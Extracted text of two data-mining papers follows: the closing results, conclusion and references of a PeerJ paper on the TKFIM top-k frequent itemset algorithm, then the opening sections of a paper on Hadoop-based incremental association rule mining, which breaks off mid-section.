To demonstrate BOMO with specified parameters k, having considered the same values for the specified parameter, we compute Top-9 frequent itemsets on all datasets as shown in Table 8. The BOMO procedure returns the wrong result and misses essential patterns. The value of the k input parameter is taken up by our proposed TKFIM and mine all Top-k Items in the dataset and does not miss the highest support pattern in the result set, as it is clear from Table 8. The proposed system’s performance is now a matter of question, so we present its result in the next section. Performance results of TKFIM In the second phase, we study our proposed TKFIM method’s performance without support threshold parameter performing sets of experiments on each dataset mentioned above, shown in Table 7. To conduct experiments, the input value of k, provided by the user, is set in the range of five to thirty. Figure 4 shows the performance results of all the approaches mentioned above on the ‘‘chess’’ dataset. In this figure, each algorithm has its execution time on the vertical side, while each algorithm performance is shown with different k-values on the horizontal bar. The Top-k miner performs poorly in a large value of k provided by the user. BOMO produces a large number of infrequent patterns that increase its run time. In all cases, with a k value between five and thirty, the BOMO algorithm has shown a poor performance. The blue bar represents the proposed algorithm TKFIM, the brown bar expresses the Top-k miner results, and the purple bar describes the BOMO algorithm results. The presented results illustrate that TKFIM outperforms both the Top-k miner and BOMO procedures. As shown in the graph, the TKFIM discovers the top five frequent items in 0.03 s, where the Top-k and BOMO consume the same amount of time to do the same job. Similarly, we discovered that the top ten frequent itemsets by TKFIM take 0.4 s, whereas the Top-k and BOMO take six seconds to do the same job. The top thirty frequent itemsets by TKFIM take 13.21 s, whereas the Top-k consume a hundred seconds, and BOMO takes 1,010 s. Our proposed technique’s performance gain over BOMO and Top-k miner on Chess dataset are 97.14 and 92.70 percent, respectively. Figure 5 shows the results of performance on the Mushroom dataset. The algorithm’s execution time on the vertical side is shown in this figure, where the horizontal bar reflects every algorithm’s performance for different values of k. The Top-k miner performs well Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 18/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Table 8 Top-k FIs mined by Top-k miner, BOMO and TKFIM. S.No Datasets Results of TKFIM for k= 10 Results of Top-k Miner For k= 10 Results of BOMO for N = 3, k=3 Wrong results itemsets missed by BOMO 1. Chess 1) 58=3195 1) 58=3195 1) 58= 3195 40= 3170 2) 52=3185 2) 52=3185 2) 52= 3185 58,40= 3169 3) 58,52=3184 3) 58,52=3184 3) 29 = 3181 52,40=3159 4) 29 = 3181 4) 29 = 3181 4) 58,52 = 3184 5) 58,29=3180 5) 58,29=3180 5) 58,29 = 3180 6) 40=3170, 52,29=3170 6) 40=3170, 52,29=3170 6) 52,29= 3170 7) 58,52,29=3169 58,40=3169 7) 58,52,29=3169 58,40=3169 7) 58,52,29=3169 8) 40=3159 8) 40=3159 8) 58,52,40=3158 9) 58,52,40=3158 9) 58,52,40=3158 9) 58,29,40=3154 10)29,40= 3155 10)29,40= 3155 2. Mushroom 1) 85=8124 1) 85=8124 1) 85 = 8124 1) 90 = 7488 2) 86=7924 85,86=7924 2) 86=7924 85,86=7924 2) 86 = 7924 2) 85,90 = 7488 3) 34=7914 34,85=7914 3) 34=7914 34,85=7914 3) 34 = 7914 3) 34 = 7914 4) 34,86=7906 34,85,86=7906 4) 34,86=7906 34,85,86=7906 4) 85,86 = 7924 5)85,86,34,90=7906 5) 90=7488 90,85=7488 5) 90=7488 90,85=7488 5) 85,34 = 7914 6) 86,34,90=7906 6) 90,34=7296 90,85,34=7296 6) 90,34=7296 90,85,34=7296 6) 86,34 =7906 7) 34,90 = 7296 7) 90,86=7288 90,34,86=7288 90,85,85=7288 90,85,34,86=7288 7) 90,86=7288 90,34,86=7288 90,85,85=7288 90,85,34,86=7288 7) 85,86,34 =7906 8) 86,90=7288 8) 36=6812 36,85=6812 8) 36=6812 36,85=6812 8) 34,85,90 = 7296 9) 36,86 = 6620 36,85,86=6620 9) 36,86 = 6620 36,85,86=6620 9) 85,86,90 = 7288 10) 36,34=6602 36, 86, 34=6602 36, 85, 34=6602 36 85 86 34 =6602 10) 36,34=6602 36, 86, 34=6602 36, 85, 34=6602 36 85 86 34 =6602 3. Connect 1) 91 = 67473 1) 91 = 67473 1) 91=67473 1) 75= 67245 2) 109=67469 2) 109=67469 2) 109=67469 2) 91, 75= 67161 3) 127= 67465 3) 127= 67465 3) 127= 67465 3) 109,75=67157 4) 91,109=67385 4) 91,109=67385 4) 91,109 = 67385 5) 91,127=67381 5) 91,127=67381 5) 91, 127=67381 6) 109,127=67377 6) 109,127=67377 6) 109,127=67377 7) 91,109,127=6729 7) 91,109,127=67293 7) 91,109,127=67293 (continued on next page) Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 19/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 Table 8 (continued) S.No Datasets Results of TKFIM for k= 10 Results of Top-k Miner For k= 10 Results of BOMO for N = 3, k=3 Wrong results itemsets missed by BOMO 8) 75=67245 8) 75=67245 8) 91,109,75=67073 9) 91,75=67161 9) 91,75=67161 9) 91,127,75=67069 10) 109,75=67157 10) 109,75=67157 4. T10I4D100K 1) 368 = 28738 1) 368 = 28738 1) 368 = 28738 1) 510 = 20125 2) 529 = 23384 2) 529 = 23384 2) 529 = 23384 2) 419 = 20216 3) 829 = 23121 3) 829 = 23121 3) 829 = 23121 3) 217 = 19326 4) 419 = 20216 4) 510 = 20125 4) 368,529 =7500 4) 489 = 18921 5) 510 = 20125 5) 419 = 20216 5) 368,829 = 6957 5) 682= 17427 6) 217 = 19326 6) 217 = 19326 6) 368,682 =6130 6) 914 = 17343 7) 489 = 18921 7) 489 = 18921 7) 682,368,489 =2420 7) 692= 17203 8) 682= 17427 8) 682= 17427 8) 368,529,692 = 2373 9) 914 = 17343 9) 914 = 17343 9) 368,529,829 = 2288 10) 692= 17203 10) 692= 17203 on smaller values of k provided by the user. However, BOMO poorly and increase its run time. In all cases of k between four and twenty, the BOMO algorithm has shown a poor performance. Further, the blue bar represents the proposed algorithm, the brown bar expresses the Top-k miner results, and the purple bar describes the BOMO algorithm results. The results show that the performance for a small amount of k is degraded compared to Top-k miner because the data set contains only a few short, frequently used items. The TKFIM discovers the top four common items in 0.74 s, in which the Top-k and BOMO take a second to do the same task, as shown in the graph. Similarly, TKFIM found that the top eight frequent itemsets take 1.24 s, and BOMO took four seconds to do the same job. It also found that TKFIM for finding top-20 frequent itemset takes 30.34 s, while the Top-k miner takes 130 s and BOMO takes 1,010 s. The performance gain of our proposed technique over BOMO and Top-k miner on Mushroom dataset is 100 and 35.87 percent, respectively. In Fig. 6, the performance results for the Connect dataset are shown. In this figure, each algorithm has its execution time on the vertical side of this figure, while each algorithm performance with different k-values is shown on the horizontal bar. The Top-k miner performs better on small values of k provided by the user. However, BOMO suffered from increased run time. In all cases of k between 5 and 25,n the BOMO algorithm shown a poor performance. Further, the blue bar represents the proposed algorithm, the brown bar expresses the Top-k miner results, and the purple bar describes the BOMO algorithm results. As shown in the graph, the TKFIM discovers the top five frequent items in 3.07 s, the Top-k miner takes nine seconds, and BOMO produces the result of the top five frequent items in 76 s. Similarly, to find the top 25 frequent itemsets by TKFIM took 60.87 s, Top-k miner took Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 20/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385 0 10 20 30 40 50 60 70 80 90 100 110 120 5 10 15 20 25 30 R u n T im e (S ec o n d s) K-Itemsets Chess TKFIM Top-k Miner BOMO Figure 4 Performance results of TKFIM on chess datasets. Full-size DOI: 10.7717/peerjcs.385/fig-4 79 s, and BOMO consumed 597 s. The performance gain of our proposed technique over BOMO and Top-k miner on Connect dataset is 78.10 and 28.53 percent, respectively. The results of synthetic dataset T40I10D100K are shown in Fig. 7. The pattern length is short in synthetic datasets, but it has 1,000 items. In this figure, the execution time of each method is shown on the vertical side, whereas the horizontal bar represents the performance of each technique for varying values of k. The Top-k miner performs better on small amounts of k provided by the user. We performed experiments for k between one and five. Further, the blue bar represents the proposed algorithm, the brown bar expresses the Top-k miner results, and the purple bar describes the BOMO algorithm results. When frequent patterns of a higher length are discovered, BOMO starts to suffer from a radical increase in execution time. As shown in the graph, the TKFIM identifies the top one frequent item in 0.06 s, the Top-k miner takes six seconds, and BOMO produces a result of the top one frequent items in 76 s. Similarly, to find the top five frequent itemsets, TKFIM takes 9.18 s, Top-k miner takes 45 s, and BOMO consumes 1,699 s. Our proposed technique’s performance gain over BOMO and Top-k miner on the T1014D100K dataset is 99.70 and 81.27 percent, respectively. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 21/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-4 http://dx.doi.org/10.7717/peerj-cs.385 0 20 40 60 80 100 120 140 160 180 200 4 8 12 16 20 ru n T im e ( S e co n d s) K-Itemsets Mushroom TKFIM Top-k Miner BOMO Figure 5 Performance results of TKFIM on mushroom dataset. Full-size DOI: 10.7717/peerjcs.385/fig-5 0 10 20 30 40 50 60 70 80 90 100 5 10 15 20 25 R u n T im e (S ec o n d s) K-Itemsets Connect TKFIM Top-k Miner BOMO Figure 6 Performance results of TKFIM on connect dataset. Full-size DOI: 10.7717/peerjcs.385/fig-6 Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 22/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-5 https://doi.org/10.7717/peerjcs.385/fig-6 http://dx.doi.org/10.7717/peerj-cs.385 0 20 40 60 80 100 120 140 160 180 200 1 2 3 4 5 R u n T im e (S ec o n d s) K-Itemsets T40I10D100K TKFIM Top-k Miner BOMO Figure 7 Performance results of TKFIM on synthetic dataset. Full-size DOI: 10.7717/peerjcs.385/fig-7 Memory usage of TKFIM To evaluate the memory consumption of the TKFIM algorithms, we execute our method for all the datasets. For the Chess dataset, TKFIM consumes a 1MB memory to obtain the result of top-5, top-10, and top-15 FIs. However, it takes 2 MB memory to produced top-25 and top-30 itemsets. Similarly, on mushroom datasets, it consumes 2MB to compute top-16 FIs and top-20 FIs. In all experiments, the gap of memory consumption increases by 1MB while increasing the value of k. In conclusion, the TKFIM algorithm presents the least memory for all the experimental datasets for a lesser value of K. The results of the various dataset are shown in Fig. 8. The memory consumption results of dataset T1014D100K, Connect, Mushroom, and Chess are shown in Figs. 8A, 8B, 8C, and 8D respecitively. These results were computed with the help of code which may not very accurate as because of different factors involment in memory consumpution. However, one thing which is apperent from these results is that less memory is needed for lesser value of K. CONCLUSION Frequent itemset mining is an exciting branch of data mining that focuses on looking at frequently co-occurring items. The items could be from patterns in any dataset like a market basket, word usage in documents, clicking behavior of users, gene sequencing, etc. Due to its wide range of applications, researchers are always trying to produce effective Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 23/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-7 http://dx.doi.org/10.7717/peerj-cs.385 0 5 10 15 20 25 30 4 8 12 16 20 M em o ry ( M B s) K Mushroom 0 20 40 60 80 100 120 140 160 180 200 1 2 3 4 5 M em o ry ( M B s) K T10I4D100K (a) 0 5 10 15 20 25 30 35 40 45 50 5 10 15 20 25 M em o ry ( M B s) K Chess (d) 0 20 40 60 80 100 120 140 160 180 200 5 10 15 20 25 M em o ry ( M B s) K Connect (c) (b) Figure 8 Memory usage of TKFIM algorithm. Full-size DOI: 10.7717/peerjcs.385/fig-8 solutions. This research has also proposed, designed, and developed an algorithm based on equivalence classes and diffset theory for mining Top-k frequent itemsets. It is found that the TKFIM has outperformed the results of these approaches in terms of execution and performance, achieving 92.70, 35.87, 28.53, and 81.27 percent gain on Top-k miner using Chess, Mushroom, Connect, and T1014D100K datasets, respectively. Similarly, TKFIM has achieved 97.14, 100, 78.10, and 99.70 percent on BOMO using Chess, Mushroom, Connect, and T1014D100K datasets, respectively. The proposed TKFIM technique outperforms its counterpart on every dataset. In the future, we plan to adapt this work to solve other data mining tasks like sequential pattern mining, temporal FIs mining, FIs based clustering, and incremental frequent itemsets mining. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work of Lisu Yu was supported by the State Key Laboratory of Computer Architecture (ICT, CAS) Open Project under Grant CARCHB202019, and by Nanchang University, Nanchang, Jiangxi, PR of China. This research was also funded by the Deanship of Scientific Research at Princess Nourah bint Abdulrahman University through the Fast-track Research Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 24/27 https://peerj.com https://doi.org/10.7717/peerjcs.385/fig-8 http://dx.doi.org/10.7717/peerj-cs.385 Funding Program. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: State Key Laboratory of Computer Architecture (ICT, CAS) Open Project: CARCHB202019. Nanchang University, Nanchang, Jiangxi, PR of China. Deanship of Scientific Research at Princess Nourah bint Abdulrahman University. Competing Interests The authors declare there are no competing interests. Author Contributions • Saood Iqbal and Abdul Shahid conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Muhammad Roman conceived and designed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Zahid Khan conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Shaha Al-Otaibi performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Lisu Yu performed the experiments, authored or reviewed drafts of the paper, arranged funding, and approved the final draft. Data Availability The following information was supplied regarding data availability: The data set and code are available in the Supplemental Files. Data was taken from the Frequent Itemset Mining Dataset Repository (http: //fimi.uantwerpen.be/data/): - T10I4D100K: http://fimi.uantwerpen.be/data/T40I10D100K.dat - Chess: http://fimi.uantwerpen.be/data/chess.dat - Connect: http://fimi.uantwerpen.be/data/connect.dat - Mushroom: http://fimi.uantwerpen.be/data/mushroom.dat. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.385#supplemental-information. REFERENCES Agrawal R, Imielinski T, Swami A. 1993. Mining association rules between sets of items in large databases. In: Proceedings of the 1993 ACM SIGMOD international conference on Management of data. New York: ACM, 207–216. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 25/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.385#supplemental-information http://fimi.uantwerpen.be/data/ http://fimi.uantwerpen.be/data/ http://fimi.uantwerpen.be/data/T40I10D100K.dat http://fimi.uantwerpen.be/data/chess.dat http://fimi.uantwerpen.be/data/connect.dat http://fimi.uantwerpen.be/data/mushroom.dat http://dx.doi.org/10.7717/peerj-cs.385#supplemental-information http://dx.doi.org/10.7717/peerj-cs.385#supplemental-information http://dx.doi.org/10.7717/peerj-cs.385 Agrawal R, Srikant R. 1994. Fast algorithms for mining association rules. In: Proc. 20th int. conf. very large data bases, VLDB, vol. 1215. 487–499. Amphawan K, Lenca P, Surarerks A. 2009. Mining top-k periodicfrequent pattern from transactional databases without support threshold. In: International conference on advances in information technology. Springer, 18–29. Cheung Y-L, Fu AW-C. 2004. Mining frequent itemsets without support threshold: with and without item constraints. IEEE Transactions on Knowledge and Data Engineering 16(9):1052–1069 DOI 10.1109/TKDE.2004.44. Fournier-Viger P, Lin JC-W, Kiran RU, Koh YS, Thomas R. 2017. A survey of sequential pattern mining. Data Science and Pattern Recognition 1(1):54–77. Fu AW-C, Kwong RW-W, Tang J. 2000. Mining n-most interesting itemsets. In: ISMIS’00: Proceedings of the 12th international symposium on foundations of intelligent systems. Berlin, Heidelberg: Springer-Verlag, 59–67. Goethals B. 2003. Frequent itemset mining dataset repository. In: Frequent Itemset Mining Implementations (FIMI’03), 2003. Piscataway: IEEE. Han J, Pei J, Yin Y. 2000. Mining frequent patterns without candidate generation. ACM Sigmod Record 29(2):1–12 DOI 10.1145/335191.335372. Han J, Wang J, Lu Y, Tzvetkov P. 2002. Mining top-k frequent closed patterns without minimum support. In: 2002 IEEE international conference on data mining, 2002. proceedings. Piscataway: IEEE, 211–218. Huynh-Thi-Le Q, Le T, Vo B, Le B. 2015. An efficient and effective algorithm for mining top-rank-k frequent patterns. Expert Systems with Applications 42(1):156–164 DOI 10.1016/j.eswa.2014.07.045. Krishnamoorthy S. 2019. Mining top-k high utility itemsets with effective threshold raising strategies. Expert Systems with Applications 117:148–165 DOI 10.1016/j.eswa.2018.09.051. Nam H, Yun U, Vo B, Truong T, Deng Z-H, Yoon E. 2020a. Efficient approach for damped window-based high utility pattern mining with list structure. IEEE Access 8:50958–50968 DOI 10.1109/ACCESS.2020.2979289. Nam H, Yun U, Yoon E, Lin JC-W. 2020b. Efficient approach for incremental weighted erasable pattern mining with list structure. Expert Systems with Applications 143:113087 DOI 10.1016/j.eswa.2019.113087. Nguyen LT, Vo B, Hong T-P, Thanh HC. 2012. Classification based on association rules: a lattice-based approach. Expert Systems with Applications 39(13):11357–11366 DOI 10.1016/j.eswa.2012.03.036. Nguyen LT, Vo B, Nguyen LT, Fournier-Viger P, Selamat A. 2018. Etarm: an efficient top-k association rule mining algorithm. Applied Intelligence 48(5):1148–1160. Pietracaprina A, Vandin F. 2007. Efficient incremental mining of top-K frequent closed itemsets. In: Discovery science, volume 4755 of lecture notes in computer science. Berlin Heidelberg: Springer, 275–280. Pyun G, Yun U. 2014. Mining top-k frequent patterns with combination reducing techniques. Applied Intelligence 41(1):76–98 DOI 10.1007/s10489-013-0506-9. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 26/27 https://peerj.com http://dx.doi.org/10.1109/TKDE.2004.44 http://dx.doi.org/10.1145/335191.335372 http://dx.doi.org/10.1016/j.eswa.2014.07.045 http://dx.doi.org/10.1016/j.eswa.2018.09.051 http://dx.doi.org/10.1109/ACCESS.2020.2979289 http://dx.doi.org/10.1016/j.eswa.2019.113087 http://dx.doi.org/10.1016/j.eswa.2012.03.036 http://dx.doi.org/10.1007/s10489-013-0506-9 http://dx.doi.org/10.7717/peerj-cs.385 Saif-Ur-Rehman , Ashraf J, Habib A, Salam A. 2016. Top-k miner: top-k identical fre- quent itemsets discovery without user support threshold. Knowledge and Information Systems 48(3):741–762 DOI 10.1007/s10115-015-0907-7. Salam A, Khayal MSH. 2012. Mining top- k frequent patterns without mini- mum support threshold. Knowledge and Information Systems 30(1):57–86 DOI 10.1007/s10115-010-0363-3. Taser YP, Birant KU, Birant D. 2020. Multitask-based association rule mining. Turkish Journal of Electrical Engineering & Computer Sciences 28(2):933–955 DOI 10.3906/elk-1905-88. Wang H, Wang W, Yang J, Yu PS. 2002. Clustering by pattern similarity, in large data sets. In: Proceedings of the 2002 ACM SIGMOD international conference on Management of data. New York: ACM, 394–405. Yildirim P, Birant D, Alpyildiz T. 2017. Discovering the relationships between yarn and fabric properties using association rule mining. Turkish Journal of Electrical Engineering & Computer Sciences 25(6):4788–4804 DOI 10.3906/elk-1611-16. Zaki MJ. 2000. Scalable algorithms for association mining. IEEE Transactions on Knowledge and Data Engineering 12(3):372–390 DOI 10.1109/69.846291. Zaki MJ, Gouda K. 2003. Fast vertical mining using diffsets. In: Proceedings of the ninth ACM SIGKDD international conference on Knowledge discovery and data mining. New York: ACM, 326–335. Iqbal et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.385 27/27 https://peerj.com http://dx.doi.org/10.1007/s10115-015-0907-7 http://dx.doi.org/10.1007/s10115-010-0363-3 http://dx.doi.org/10.3906/elk-1905-88 http://dx.doi.org/10.3906/elk-1611-16 http://dx.doi.org/10.1109/69.846291 http://dx.doi.org/10.7717/peerj-cs.385 work_r3udk3pxondchj7ht2quqypene ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 7 Incremental Association Rule Mining Algorithm Based on Hadoop Zhu Ying School of Computer Science and Engineering Xi’an Technological University Xi’ an, 710021, China e-mail: 642454565@qq.com Wang Jianguo School of Computer Science and Engineering Xi’an Technological University Xi’ an, 710021, China e-mail: wjg_xit@126.com Abstract—Aiming at the problems of low efficiency, low cost of time and space, this paper proposes an incremental association rule mining algorithm based on Hadoop load balancing. In combination with the tree structure, when the data in the database is constantly updated, it does not need to scan the original database to generate frequent item sets, and use the load balancing in the data distribution so that the master node distributes the data to the child nodes evenly. In the experiment of control variable method, the variables of minimum support and sample increment are processed respectively. The experimental results show that when the minimum support is unchanged and the transaction data set is increased, the incremental association rule mining algorithm based on Hadoop load balancing takes less than 14.3% of the Apriori algorithm. The number of association rules mined by the algorithm is more than that of the Apriori algorithm. And the memory usage of the Hadoop-based incremental association rule mining algorithm is much smaller than the Apriori algorithm; when the total amount of transaction data is constant and the minimum support is changed, the memory usage of the Hadoop-based incremental association rule mining algorithm is smaller than the Apriori algorithm. The Hadoop-based incremental association rule mining algorithm has some improvements in memory usage and efficiency. Keywords—Hadoop; Tree Structure; Load Balancing; Frequent item Sets; Association Rules I. INTRODUCTION In today's era of big data, data is an important asset of information society, while data processing and management are also facing great challenges, such as data large amount of information, difficult to handle, difficult to obtain value. Data Mining [1] is a deep data intelligence analysis method. The method involves knowledge of many related fields such as machine learning, deep learning, artificial intelligence, and information retrieval. It is mainly used to extract potential information data from a massive data set that can contribute to the value of business decisions.Association rule mining technology [2] is a very important part of data mining technology. Under the big data environment, it can find many valuable information from the huge and irregular data by discovering the relationship among the items in the data set. Research on association rule algorithm in big datatechnology environment is a very important and challenging research topic. Considering that the data in the database is constantly updated, the incremental association rule updating techniques have been proposed to effectively maintain the association rules of updated data. Literatures[3-4] proposed incremental association rule update technology, it is a highly efficient maintenance of data updating association rules, the literature describes in detail the characteristics of the technology. In the literature [5], the frequent item sets mining algorithm of association rules is proposed, which is an important component of association rule analysis, data statistics, causality and other mining tasks. The idea of parallel implementation of algorithm is proposed in the literature [6]. Data is distributed by the master node to each node to reduce the load pressure. In the literature [7], the FUP algorithm needs to scan the original database several times to solve the frequent item sets. Of the data environment, the mining efficiency is low. DOI: 10.21307/ijanmc-2019-015 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 8 In the literature [8-9] , the paper introduces the characteristics and structure of the B+ tree, also mentioned the one-dimensional data index structure in the database. When dealing with large amounts of data, processing efficiency can be compromised due to high server load.Therefore, this paper presents proposes an incremental association rule mining algorithm based on Hadoop load balancing. The implementation of this algorithm uses the Map/ Reduce programming model to parallelize the mining tasks, and uses load balancing to mine frequent item sets in the clusters to get the association rules. II. FUP ALGORITHM (FAST UPDATE PARALLEL) TABLE I. SYMBOLIC DESCRIPTION symbol means DB raw data set db new data set DBUdb all data sets frequent item sets(k-order) candidate set(k-order) When calculating the frequent item sets, the FUP algorithm [10] makes use of the known support of the old frequent item sets, and then through the frequent analysis of the candidate item sets in DB and db, many candidates can be filtered out in the process of determining frequent item sets. Therefore, it is more efficient than re-running the Apriori algorithm, especially if the old and new frequent sets are not much different. However, like the Apriori algorithm, the FUP algorithm must spend a lot of time processing a large set of candidate items and it is necessary to repeatedly scan the database DB and db to pattern match the candidate sets. Since the FUP algorithm uses to generate , the generated candidate set of db is large, and many of them are infrequent, and some even are impossible to appear in db, which affects the efficiency of the algorithm. In addition, the FUP algorithm needs to perform K+1 layer scanning on the entire database DBUdb. In general, the original database DB is very large, so the k+1 layer scanning for the DB is not efficient. The shortcomings of the current incremental update association mining algorithm: 1) When the database is updated, the generation of frequent item sets will repeatedly scan the processed data sets, so that the mining efficiency is not high; 2) generating a large number of candidate sets; 3) With the addition of the database, the minimum support threshold and the minimum confidence threshold do not change, which will affect the mining of strong association rules; III. FUP ALGORITHM IMPROVEMENT Due to the inefficiency of FUP algorithm in dealing with big data mining, this paper proposes an improved algorithm of FUP, Incremental Association Rule Mining Algorithm Based on Hadoop Load Balancing. Combined with the Hadoop distributed platform and the use of a tree structure to store information, it is only necessary to scan the DB and dbone time, which can effectively improve the scanning efficiency. When the database is updated, the Newton interpolation formula is used to estimate the support threshold to efficiently process the association rules. A. Vertical data representation [11] A traditional database can be represented by a two-dimensional matrix. Each column of a two-dimensional matrix can be treated as a project, and each row can be treated as a transaction of the database. In the traditional Apriori algorithm, horizontal data is used to represent a transaction. The typical method of implementing two-dimensional matrix is horizontal data. Most data mining algorithms use database access to calculate their support. In relational databases, the size of the data in the transaction database is relatively large, and there is a problem with the size of the computer memory at present, and there will be bottlenecks. This will lead to a contradiction: due to the continuous increase of data in the database. The size of the data will be larger and larger, but the memory and hard disk International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 9 of the computer are limited. Therefore, when the data in the database reaches a certain scale, the computer memory and the hard disk will not be stored enough. Therefore, a new type of data representation is generated—vertical data representation. Vertical data means that each record in the database consists of a list of all the transaction records that it has appeared, as shown in Tab.2: TABLE II. HORIZONTAL DATABASE TID Item 1 2 3 4 5 6 citrus fruit, yogurt, butter, ham tropical fruit,yogurt, coffee whole milk,citrus fruit,newspapers tropical fruit, yogurt, cream cheese , whole milk coffee, butter, yogurt, sauces, ham butter, ham, cream cheese, sauces, newspapers TABLE III. VERTICAL DATABASE Item TID butter citrus fruit coffee cream cheese ham newspapers sauces tropical fruit whole milk yogurt 1,5,6 1,3 2,5 4,6 1,5,6 3,6 5,6 2,4 3,4 1,2,4,5 B. Tree structure stores data information The B+ tree [12] is a tree data structure, which is an n-fork sort tree. It is a variant tree of B-trees required by the file system. It features: 1) There are n keywords in the node of n sub-trees. Each keyword does not save data, only used for indexing, and all data is stored in leaf nodes. 2) All leaf nodes contain information about all keywords, and pointers to records containing these keywords, and the leaf nodes themselves are linked in order from the smallest to the largest. 3) All non-terminal nodes can be thought of as index parts, which contain only the largest (or smallest) keyword in their sub-tree (root node). As shown in Fig. 1, it is a B+ tree of m=3(consisting of information in Tab.2). butter sauces P1 P2 butter cream cheese P1 P2 sauces whole milk P1 P2 butter cream cheese 3 2 coffee 2 cream cheese ham 2 3 newspapers 2 sauces tropical fruit 2 2 whole milk yogurt 2 4 Figure 1. Order three of the B+ tree C. Hadoop distributed platform In this era of increasing data size, the traditional frequent item set mining algorithm has been difficult to support the mining of its massive transaction database. Even if it can be mined, it will lead to a particularly long mining time, or it may be due to the huge amount of data. Causes the program to fail. The solution to the problem of the traditional frequent item set mining algorithm is to add the Hadoop distributed platform to the frequent item set mining algorithm, which not only makes the traditional frequent item set mining algorithm run more efficiently, but also reduces the storage pressure of the database. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 10 Transaction database D Data block 1 Data block 2 Data block 3 Find local frequent item sets Find local frequent item sets Find local frequent item sets Form a global candidate set Find global frequent item sets in the candidate set Get frequent item sets Map阶段 Map阶段 Reduce阶段 Reduce阶段 Figure 2. Frequent item set generation step diagram D. HBPT-FUP algorithm Based on the original algorithm, there are some disadvantages of generating a large number of candidate sets and repeated retrieval processing of the original database. Combined with the characteristics of B+ tree, the data information is stored. Based on FUP algorithm, the incremental association rule mining algorithm under Hadoop platform is proposed: HBPT- FUP algorithm(Incremental Association Rule Mining Algorithm Based on Hadoop Load Balancing，Improved Algorithm of FUP Algorithm). 1) Basic ideas ① Statistics in the database transaction items, get transaction items set. ② Setup process load estimation, through the Map process using load balancing grouping way to read the transaction items, distributed to different Reduce nodes. The Reduce process is based on how the B+ tree is created and stores transaction item information. The bottommost leaf node of B+ tree contains all the item sets. The frequent item sets are obtained by comparing the number of items with the minimum support, and other infrequent item sets remain in their leaf nodes to ensure that future data updating become frequent nodes. The local frequent item sets are obtained by the B+ tree created by the Reduce nodes, and the local frequent item sets are merged into the global frequent item sets to get the association rules. Compared with the previous incremental updating correlation mining algorithm, the algorithm has the characteristics of load balancing. When dealing with large amounts of data, due to a single server load is too high affect the processing speed, so need to use server clusters to deal with. The load factor is added to the estimation of the load, which can calculate the load of each frequent item more accurately. The algorithm takes advantage of the B+ balanced tree properties. The leaf nodes at the bottom of the tree contain all the keywords of the whole tree, and they are linked together like a doubly linked list. 2) Estimated load The load in the parallelization process is equal to the sum of the load on each node [11]. supposed that the load corresponding to the data item is i L , the position in the frequent item set is iP , the load influence factor is i a (the frequency of the data item): (1) 3) Equalization of data Frequent items in frequent item sets are divided into Q groups according to the balanced grouping strategy, which makes the data balance in the distribution process so as to improve the parallelization of the mining process. If Q is less than the length of frequent itemsets, the Q items of frequent itemsets are assigned to each group in turn. The group's load is initialized by the sum of the frequent item loads in each group. And then repeat the following two steps until all the frequent items are assigned: ① To assign unallocated frequent items to the group with the lowest load; ② The load in each group is added up. If Q is greater than the length of frequent itemsets, the first x of the frequent itemsets is assigned to the x group, which initializes the group load according to the load of the frequent items it contains, and then repeats the above two steps until all Frequent items are assigned. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 11 4) Threshold setting The minimum support threshold will change with the user's needs and the database update. When the threshold is set too low, the more rules are mined, but the rule is less useful. Conversely, when the threshold is set too high, there are very few rules for mining, which will lose some useful rules. Therefore, it is very important to set the appropriate threshold when dealing with incremental databases. Definition 1: The support degree of item set is one of the most important metrics in association rule mining. It represents the probability that the item set will appear in the total item set. The formula is: (2) Where is the total transaction sets.num() represents the number of occurrences of a particular item set in a transaction set. Definition 2: Confidence indicates the probability that Y is derived by the association rule in the event that the prerequisite X occurs. That is, in the item set containing X, there is a possibility of Y. The formula is: (3) The Newton interpolation formula [13] that can be used to derive the support threshold from the above formula is: (4) Where C is the confidence level, n is the number of rules, and M is the total number of attributes in the transaction set. When the association rule is first mined, the setting of the minimum support threshold is a trial and error process. When the transaction database is updated, it is possible that the previously set threshold is no longer applicable, so an adjustment threshold is required. In order to improve the accuracy of the estimation, the order of the Newton interpolation polynomial can be improved as the number of executions of the algorithm increases. Because the algorithm generates a parameter pair each time it runs. If this node is farther from the nearest two nearest interpolation nodes in the interpolation formula, you can add this node as a new interpolation node and adjust the interpolation formula. The accuracy of the adjustment of the adjusted interpolation formula at point is greatly improved. Newton interpolation formula automatically determines the specific implementation process of support threshold, as follows: Statistics are performed on some data in the experimental transaction data set 